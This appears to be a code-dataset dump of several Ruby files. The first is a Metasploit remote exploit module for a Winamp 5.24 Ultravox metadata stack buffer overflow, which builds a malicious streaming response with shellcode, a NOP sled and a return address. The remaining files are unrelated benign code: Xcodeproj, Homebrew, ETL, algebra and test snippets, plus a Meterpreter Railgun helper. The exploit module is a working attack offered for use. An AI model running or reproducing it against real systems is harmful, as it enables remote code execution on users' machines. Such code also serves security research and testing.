# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Winamp 5.24. By
sending an overly long artist tag, a remote attacker may
be able to execute arbitrary code. This vulnerability can be
exploited from the browser or the winamp client itself.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-0065' ],
[ 'OSVDB', '41707' ],
[ 'BID', '27344' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],
],
'Privileged' => false,
'DisclosureDate' => 'Jan 18 2008',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
res = client.get_once
content = "\x00\x01\x00\x01\x00\x01" + "<metadata><song><artist>"
content << make_nops(3828 - payload.encoded.length) + payload.encoded
content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)
content << "</artist></song></metadata>"
sploit = "\x5a\x00\x39\x01" + [content.length].pack('n')
sploit << content + "\x00"
# randomize some stuff.
num = rand(65535).to_s
header = "HTTP/1.0 200 OK\r\n"
header << "Server: Ultravox 3.0\r\n"
header << "Content-Type: misc/ultravox\r\n"
header << "Ultravox-SID: #{num}\r\n"
header << "Ultravox-Avg-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Msg: #{num}\r\n"
header << "Ultravox-Stream-Info: Ultravox;Live Stream\r\n"
header << "Ultravox-Msg-Que: #{num}\r\n"
header << "Ultravox-Max-Fragments: 1\r\n\r\n"
header << sploit
print_status("Sending #{header.length} bytes")
client.put(header)
handler(client)
service.close_client(client)
end
end
=begin
HTTP/1.0 200
.Server: Ultravo
x 3.0..Content-T
ype: misc/ultrav
ox..Ultravox-SID
: 22221..Ultravo
x-Avg-Bitrate: 6
4000..Ultravox-M
ax-Bitrate: 9600
0..Ultravox-Max-
Msg: 16000..Ultr
avox-Stream-Info
: Ultravox;Live
Stream..Ultravox
-Msg-Que: 39..Ul
travox-Max-Fragm
Z.9..,......<met
adata><length>0<
/length><soon>Mo
re on
</soon><song><na
me>The Night
ghts In
tin</name><album
>Days Of
Passed</album><a
rtist>The Moody
Blues</artist><a
lbum_art>xm/stat
ion_logo_WBCRHT.
jpg</album_art><
album_art_200>xm
/station_logo_WB
CRHT_200.jpg</al
bum_art_200><ser
ial>-1</serial><
song_id>-1</song
_id><amg_song_id
>-1</amg_song_id
><amg_artist_id>
-1</amg_artist_i
d><amg_album_id>
-1</amg_album_id
><itunes_song_id
>-1</itunes_song
_id><itunes_arti
st_id>-1</itunes
_artist_id><itun
es_album_id>-1</
itunes_album_id>
</song></metadat
a>.Z.......\./!.
!.UP.......B...&
Z....D)ydB.,.vy/
=end
| 23.639241 | 89 | 0.635341 |
ede6c8d58d460f636df94d1ef20057c11dd150ff | 822 | require 'xcodeproj/scheme/xml_element_wrapper'
module Xcodeproj
class XCScheme
# This abstract class aims to be the base class for every XxxAction class
# that have a #build_configuration attribute
#
class AbstractSchemeAction < XMLElementWrapper
# @return [String]
# The build configuration associated with this action
# (usually either 'Debug' or 'Release')
#
def build_configuration
@xml_element.attributes['buildConfiguration']
end
# @param [String] config_name
# The build configuration to associate with this action
# (usually either 'Debug' or 'Release')
#
def build_configuration=(config_name)
@xml_element.attributes['buildConfiguration'] = config_name
end
end
end
end
| 30.444444 | 77 | 0.663017 |
ff3edc0656ed7afa9807c9603af95c230cceeec7 | 315 | require "algebra"
P = MPolynomial(Rational)
x, y, z = P.vars "xyz"
f1 = x**2 + y**2 + z**2 -1
f2 = x**2 + z**2 - y
f3 = x - z
coeff, basis = Groebner.basis_coeff([f1, f2, f3])
basis.each_with_index do |b, i|
p [coeff[i].inner_product([f1, f2, f3]), b]
p coeff[i].inner_product([f1, f2, f3]) == b #=> true
end
| 22.5 | 54 | 0.587302 |
875b0e98a2bc5411c5d17db0dba05b8d69ce2d42 | 7,439 | require "formula"
require "compilers"
# Homebrew extends Ruby's `ENV` to make our code more readable.
# Implemented in {SharedEnvExtension} and either {Superenv} or
# {Stdenv} (depending on the build mode).
# @see Superenv
# @see Stdenv
# @see http://www.rubydoc.info/stdlib/Env Ruby's ENV API
module SharedEnvExtension
include CompilerConstants
# @private
CC_FLAG_VARS = %w[CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS]
# @private
FC_FLAG_VARS = %w[FCFLAGS FFLAGS]
# @private
SANITIZED_VARS = %w[
CDPATH GREP_OPTIONS CLICOLOR_FORCE
CPATH C_INCLUDE_PATH CPLUS_INCLUDE_PATH OBJC_INCLUDE_PATH
CC CXX OBJC OBJCXX CPP MAKE LD LDSHARED
CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS LDFLAGS CPPFLAGS
MACOSX_DEPLOYMENT_TARGET SDKROOT DEVELOPER_DIR
CMAKE_PREFIX_PATH CMAKE_INCLUDE_PATH CMAKE_FRAMEWORK_PATH
GOBIN GOPATH GOROOT
LIBRARY_PATH
]
# @private
def setup_build_environment(formula = nil)
@formula = formula
reset
end
# @private
def reset
SANITIZED_VARS.each { |k| delete(k) }
end
def remove_cc_etc
keys = %w[CC CXX OBJC OBJCXX LD CPP CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS LDFLAGS CPPFLAGS]
removed = Hash[*keys.flat_map { |key| [key, self[key]] }]
keys.each do |key|
delete(key)
end
removed
end
def append_to_cflags(newflags)
append(CC_FLAG_VARS, newflags)
end
def remove_from_cflags(val)
remove CC_FLAG_VARS, val
end
def append(keys, value, separator = " ")
value = value.to_s
Array(keys).each do |key|
old = self[key]
if old.nil? || old.empty?
self[key] = value
else
self[key] += separator + value
end
end
end
def prepend(keys, value, separator = " ")
value = value.to_s
Array(keys).each do |key|
old = self[key]
if old.nil? || old.empty?
self[key] = value
else
self[key] = value + separator + old
end
end
end
def append_path(key, path)
append key, path, File::PATH_SEPARATOR if File.directory? path
end
# Prepends a directory to `PATH`.
# Is the formula struggling to find the pkgconfig file? Point it to it.
# This is done automatically for `keg_only` formulae.
# <pre>ENV.prepend_path "PKG_CONFIG_PATH", "#{Formula["glib"].opt_lib}/pkgconfig"</pre>
def prepend_path(key, path)
prepend key, path, File::PATH_SEPARATOR if File.directory? path
end
def prepend_create_path(key, path)
path = Pathname.new(path) unless path.is_a? Pathname
path.mkpath
prepend_path key, path
end
def remove(keys, value)
Array(keys).each do |key|
next unless self[key]
self[key] = self[key].sub(value, "")
delete(key) if self[key].empty?
end if value
end
def cc
self["CC"]
end
def cxx
self["CXX"]
end
def cflags
self["CFLAGS"]
end
def cxxflags
self["CXXFLAGS"]
end
def cppflags
self["CPPFLAGS"]
end
def ldflags
self["LDFLAGS"]
end
def fc
self["FC"]
end
def fflags
self["FFLAGS"]
end
def fcflags
self["FCFLAGS"]
end
# Outputs the current compiler.
# @return [Symbol]
# <pre># Do something only for clang
# if ENV.compiler == :clang
# # modify CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS in one go:
# ENV.append_to_cflags "-I ./missing/includes"
# end</pre>
def compiler
@compiler ||= if (cc = ARGV.cc)
warn_about_non_apple_gcc($&) if cc =~ GNU_GCC_REGEXP
fetch_compiler(cc, "--cc")
elsif (cc = homebrew_cc)
warn_about_non_apple_gcc($&) if cc =~ GNU_GCC_REGEXP
compiler = fetch_compiler(cc, "HOMEBREW_CC")
if @formula
compilers = [compiler] + CompilerSelector.compilers
compiler = CompilerSelector.select_for(@formula, compilers)
end
compiler
elsif @formula
CompilerSelector.select_for(@formula)
else
MacOS.default_compiler
end
end
# @private
def determine_cc
COMPILER_SYMBOL_MAP.invert.fetch(compiler, compiler)
end
COMPILERS.each do |compiler|
define_method(compiler) do
@compiler = compiler
self.cc = determine_cc
self.cxx = determine_cxx
end
end
# Snow Leopard defines an NCURSES value the opposite of most distros.
# See: https://bugs.python.org/issue6848
# Currently only used by aalib in core.
def ncurses_define
append "CPPFLAGS", "-DNCURSES_OPAQUE=0"
end
# @private
def userpaths!
paths = ORIGINAL_PATHS.map { |p| p.realpath.to_s rescue nil } - %w[/usr/X11/bin /opt/X11/bin]
self["PATH"] = paths.unshift(*self["PATH"].split(File::PATH_SEPARATOR)).uniq.join(File::PATH_SEPARATOR)
# XXX hot fix to prefer brewed stuff (e.g. python) over /usr/bin.
prepend_path "PATH", HOMEBREW_PREFIX/"bin"
end
def fortran
flags = []
if fc
ohai "Building with an alternative Fortran compiler"
puts "This is unsupported."
self["F77"] ||= fc
if ARGV.include? "--default-fortran-flags"
flags = FC_FLAG_VARS.reject { |key| self[key] }
elsif values_at(*FC_FLAG_VARS).compact.empty?
opoo <<-EOS.undent
No Fortran optimization information was provided. You may want to consider
setting FCFLAGS and FFLAGS or pass the `--default-fortran-flags` option to
`brew install` if your compiler is compatible with GCC.
If you like the default optimization level of your compiler, ignore this
warning.
EOS
end
else
if (gfortran = which("gfortran", (HOMEBREW_PREFIX/"bin").to_s))
ohai "Using Homebrew-provided fortran compiler."
elsif (gfortran = which("gfortran", ORIGINAL_PATHS.join(File::PATH_SEPARATOR)))
ohai "Using a fortran compiler found at #{gfortran}."
end
if gfortran
puts "This may be changed by setting the FC environment variable."
self["FC"] = self["F77"] = gfortran
flags = FC_FLAG_VARS
end
end
flags.each { |key| self[key] = cflags }
set_cpu_flags(flags)
end
# ld64 is a newer linker provided for Xcode 2.5
# @private
def ld64
ld64 = Formulary.factory("ld64")
self["LD"] = ld64.bin/"ld"
append "LDFLAGS", "-B#{ld64.bin}/"
end
# @private
def gcc_version_formula(name)
version = name[GNU_GCC_REGEXP, 1]
gcc_version_name = "gcc#{version.delete(".")}"
gcc = Formulary.factory("gcc")
if gcc.version_suffix == version
gcc
else
Formulary.factory(gcc_version_name)
end
end
# @private
def warn_about_non_apple_gcc(name)
begin
gcc_formula = gcc_version_formula(name)
rescue FormulaUnavailableError => e
raise <<-EOS.undent
Homebrew GCC requested, but formula #{e.name} not found!
You may need to: brew tap homebrew/versions
EOS
end
unless gcc_formula.opt_prefix.exist?
raise <<-EOS.undent
The requested Homebrew GCC was not installed. You must:
brew install #{gcc_formula.full_name}
EOS
end
end
def permit_arch_flags; end
private
def cc=(val)
self["CC"] = self["OBJC"] = val.to_s
end
def cxx=(val)
self["CXX"] = self["OBJCXX"] = val.to_s
end
def homebrew_cc
self["HOMEBREW_CC"]
end
def fetch_compiler(value, source)
COMPILER_SYMBOL_MAP.fetch(value) do |other|
case other
when GNU_GCC_REGEXP
other
else
raise "Invalid value for #{source}: #{other}"
end
end
end
end
| 24.470395 | 107 | 0.655061 |
03ea441cb4450488d6c5093eeb66acd656e134b3 | 660 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module ReviewApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
end
end
| 33 | 82 | 0.765152 |
ab92eee55eff30cbea9bea83472ac6e57b93fd92 | 5,368 | require 'etl/version'
require 'etl/helpers'
require 'logger'
require 'date'
require 'time'
class ETL
include Helpers
attr_accessor :description
attr_accessor :connection
attr_reader :logger
ORDERED_ETL_OPERATIONS = [
:ensure_destination,
:before_etl,
:etl,
:after_etl
]
ITERATOR_OPERATIONS = [
:start,
:step,
:stop
]
def self.connection= connection
@connection = connection
end
def self.connection
@connection
end
def self.defaults
{connection: @connection}
end
def initialize attributes = {}
self.class.defaults.merge(attributes).each do |key, value|
self.send "#{key}=", value
end
default_logger! unless attributes.keys.include?(:logger)
end
def config &block
yield self if block_given?
self
end
def logger= logger
@logger = logger
end
# A little metaprogramming to consolidate the generation of our sql
# generating / querying methods. Note that we don't metaprogram the etl
# operation as it's a little more complex.
#
# This will produce methods of the form:
#
# def [name] *args, &block
# if block_given?
# @[name] = block
# else
# @[name].call self, *args if @[name]
# end
# end
#
# for any given variable included in the method name's array
(ORDERED_ETL_OPERATIONS - [:etl]).each do |method|
define_method method do |*args, &block|
warn_args_will_be_deprecated_for method unless args.empty?
if block
instance_variable_set("@#{method}", block)
else
instance_variable_get("@#{method}").
call(self, *args) if instance_variable_get("@#{method}")
end
end
end
def etl *args, &block
warn_args_will_be_deprecated_for :etl unless args.empty?
if block_given?
@etl = block
else
if iterate?
if @etl
current = start
@etl.call self, cast(current), cast(current += step) while stop >= current
end
else
@etl.call self, *args if @etl
end
end
end
# A little more metaprogramming to consolidate the generation of
# our sql generating / querying methods.
#
# This will produce methods of the form:
#
# def [method] *args, &block
# if block
# @_[method]_block = block
# else
# # cache block's result
# if defined? @[method]
# @[method]
# else
# @[method] = @_[method]_block.call(self, *args)
# end
# end
# end
#
# for any given variable included in the method name's array
ITERATOR_OPERATIONS.each do |method|
define_method method do |*args, &block|
warn_args_will_be_deprecated_for method unless args.empty?
if block
instance_variable_set("@_#{method}_block", block)
else
if instance_variable_defined?("@#{method}")
instance_variable_get("@#{method}")
else
instance_variable_set("@#{method}",
instance_variable_get("@_#{method}_block")
.call(self, *args))
end
end
end
end
def run options = {}
(ORDERED_ETL_OPERATIONS - [*options[:except]]).each do |method|
send method
end
end
def query sql
time_and_log(sql: sql) do
connection.query sql
end
end
def info data = {}
logger.info data.merge(emitter: self) if logger?
end
def debug data = {}
logger.debug data.merge(emitter: self) if logger?
end
private
def warn_args_will_be_deprecated_for method
warn "DEPRECATED: passing arguments to ##{method} will be removed in an upcoming release and will raise an exception. Please remove this from your code."
end
def iterate?
ITERATOR_OPERATIONS.all? do |method|
instance_variable_defined?("@_#{method}_block")
end
end
def default_logger!
@logger = default_logger
end
def logger?
!!@logger
end
def default_logger
::Logger.new(STDOUT).tap do |logger|
logger.formatter = proc do |severity, datetime, progname, msg|
event_details = "[#{datetime}] #{severity} #{msg[:event_type]}"
emitter_details = "\"#{msg[:emitter].description || 'no description given'}\""
emitter_details += " (object #{msg[:emitter].object_id})"
leadin = "#{event_details} for #{emitter_details}"
case msg[:event_type]
when :query_start
"#{leadin}\n#{msg[:sql]}\n"
when :query_complete
"#{leadin} runtime: #{msg[:runtime]}s\n"
else
"#{leadin}: #{msg[:message]}\n"
end
end
end
end
def time_and_log data = {}, &block
start_runtime = Time.now
debug data.merge(event_type: :query_start)
retval = yield
info data.merge(event_type: :query_complete,
runtime: Time.now - start_runtime)
retval
end
# NOTE: If you needed to handle more type data type casting you can add a
# case statement. If you need to be able to handle entirely different sets
# of casting depending on database engine, you can modify #cast to take a
# "type" arg and then determine which caster to route the arg through
def cast arg
case arg
when Date then arg.strftime("%Y-%m-%d")
when Time then arg.strftime("%Y-%m-%d %H:%M:%S")
else
arg
end
end
end
| 24.289593 | 157 | 0.621461 |
621635ce3e6771479cc806e7562fbab483684544 | 379 | RSpec.describe SaferFloats do
it "raises an exception when floating point numbers are compared for equality" do
expect{
0.1 + 0.2 == 0.3
}.to raise_exception(SaferFloats::Error)
end
it "raises an exception when floating point numbers are compared for inequality" do
expect{
0.1 + 0.2 != 0.3
}.to raise_exception(SaferFloats::Error)
end
end
| 23.6875 | 85 | 0.688654 |
bfa7c982aa1e87f8acdfdaa4c3615bba6437be91 | 5,042 | # Copyright (c) 2010, [email protected]
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL [email protected] BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Railgun
#
# shared functions
#
#
module DLLHelper
# converts ruby string to zero-terminated ASCII string
def str_to_ascii_z(str)
return str+"\x00"
end
# converts 0-terminated ASCII string to ruby string
def asciiz_to_str(asciiz)
zero_byte_idx = asciiz.index("\x00")
if zero_byte_idx != nil
return asciiz[0, zero_byte_idx]
else
return asciiz
end
end
# converts ruby string to zero-terminated WCHAR string
def str_to_uni_z(str)
enc = str.unpack("C*").pack("v*")
enc += "\x00\x00"
return enc
end
# converts 0-terminated UTF16 to ruby string
def uniz_to_str(uniz)
uniz.unpack("v*").pack("C*").unpack("A*")[0]
end
# parses a number param and returns the value
# raises an exception if the param cannot be converted to a number
# examples:
# nil => 0
# 3 => 3
# "MB_OK" => 0
# "SOME_CONSTANT | OTHER_CONSTANT" => 17
# "tuna" => !!!!!!!!!!Exception
#
# Parameter "win_consts" is a WinConstantManager
def param_to_number(v, win_consts = @win_consts)
if v.class == NilClass then
return 0
elsif v.class == Fixnum then
return v # ok, it's already a number
elsif v.class == Bignum then
return v # ok, it's already a number
elsif v.class == String then
dw = win_consts.parse(v) # might raise an exception
if dw != nil
return dw
else
raise ArgumentError, "Param #{v} (class #{v.class}) cannot be converted to a number. It's a string but matches no constants I know."
end
else
raise "Param #{v} (class #{v.class}) should be a number but isn't"
end
end
# assembles the buffers "in" and "inout"
def assemble_buffer(direction, function, args)
layout = {} # paramName => BufferItem
blob = ""
#puts " building buffer: #{direction}"
function.params.each_with_index do |param_desc, param_idx|
#puts " processing #{param_desc[0]} #{param_desc[1]} #{param_desc[2]}"
# we care only about inout buffers
if param_desc[2] == direction
buffer = nil
# Special case:
# The user can choose to supply a Null pointer instead of a buffer
# in this case we don't need space in any heap buffer
if param_desc[0][0,1] == 'P' # type is a pointer
if args[param_idx] == nil
next
end
end
case param_desc[0] # required argument type
when "PDWORD"
dw = param_to_number(args[param_idx])
buffer = [dw].pack('V')
when "PWCHAR"
raise "param #{param_desc[1]}: string expected" unless args[param_idx].class == String
buffer = str_to_uni_z(args[param_idx])
when "PCHAR"
raise "param #{param_desc[1]}: string expected" unless args[param_idx].class == String
buffer = str_to_ascii_z(args[param_idx])
when "PBLOB"
raise "param #{param_desc[1]}: please supply your BLOB as string!" unless args[param_idx].class == String
buffer = args[param_idx]
# other types (non-pointers) don't reference buffers
# and don't need any treatment here
end
if buffer != nil
#puts " adding #{buffer.length} bytes to heap blob"
layout[param_desc[1]] = BufferItem.new(param_idx, blob.length, buffer.length, param_desc[0])
blob += buffer
# sf: force 8 byte alignment to satisfy x64, wont matter on x86.
while( blob.length % 8 != 0 )
blob += "\x00"
end
#puts " heap blob size now #{blob.length}"
end
end
end
#puts " built buffer: #{direction}"
return [layout, blob]
end
end
end; end; end; end; end; end;
| 33.838926 | 136 | 0.695954 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.